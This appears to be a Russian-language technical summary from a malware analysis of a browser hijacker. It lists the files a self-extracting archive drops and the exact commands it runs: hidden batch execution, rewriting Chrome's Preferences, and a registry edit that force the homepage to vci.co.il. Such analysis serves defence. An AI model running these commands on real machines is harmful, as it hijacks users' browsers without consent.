Техническая информация
- %TEMP%\7zipsfx.000\vci.bat
- %TEMP%\7zipsfx.000\sfk.exe
- %TEMP%\7zipsfx.000\sfk.exe
- %TEMP%\7zipsfx.000\vci.bat
- '%TEMP%\7zipsfx.000\sfk.exe' filter "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Preferences" -rep _"\"homepage\": \"http://www.*"_"\"homepage\": \"http://www.vci.co.il/\","_ -yes -write
- '%TEMP%\7zipsfx.000\sfk.exe' filter "%LOCALAPPDATA%\Google\Chrome\User Data\Default\Preferences" -rep _"startup\": [*"_"startup\": [ \"http://vci.co.il/\" ]"_ -yes -write
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZipSfx.000\vci.bat" "' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c ""%TEMP%\7ZipSfx.000\vci.bat" "
- '%WINDIR%\syswow64\reg.exe' ADD "HKCU\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN" /V "START PAGE" /D "http://www.vci.co.il/" /F